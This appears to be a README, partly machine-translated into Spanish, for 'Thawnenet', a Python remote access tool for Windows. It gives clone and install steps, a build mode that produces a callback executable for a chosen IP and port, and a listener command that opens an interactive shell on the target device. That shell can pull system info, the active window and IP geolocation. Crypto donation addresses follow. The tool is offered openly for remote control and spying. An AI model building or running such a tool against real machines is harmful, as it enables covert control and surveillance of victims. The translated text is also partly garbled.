Thawnenet es una herramienta diseñada para dar el control del sistema de Windows de forma remota y recuperar información de él. Thawnenet es una aplicación de cliente/servidor desarrollada en Python Windows para el lado del cliente y el servidor también está en Python.

Thawnenet requiere python3
git clone https://github.com/cisamu123/ThawneNet.git
cd ThawneNET
pip install -r requirements.txt
```.
### Available Modes
* `--build` - for building the exe
* `--shell` - getting an interactive shell of the device
buildUso: Python3 Server.py - -Build
shellUso: python3 server.py --shell [banderas] Flags: -i, --ip Listner Dirección IP -P, -Port Listner Número de puerto
Después de ejecutar el modo shell , obtendrá un intérprete del dispositivo
Comandos que pueden ejecutarse en el intérprete
info --> returns basic info of the device
activeWindow --> returns active window
battery --> returns battery info
whois --> returns the ip, city, country etc of the device
clear --> clears the screen
exit --> exit the interpreter
Para construir el EXE utilizando IP y puerto deseados: python3 server.py --build
Para obtener el intérprete: python3 server.py --shell -i 0.0.0.0 -p 8000

BTC: bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH: 0x8d797249170d263B959A3c688D8456adBcfBC319
Xmrt: 0xF978FE35d00A201eB48aB3908993e14f312001a2
Thawnenet tiene licencia bajo la licencia MIT, eche un vistazo a la licencia para obtener más información.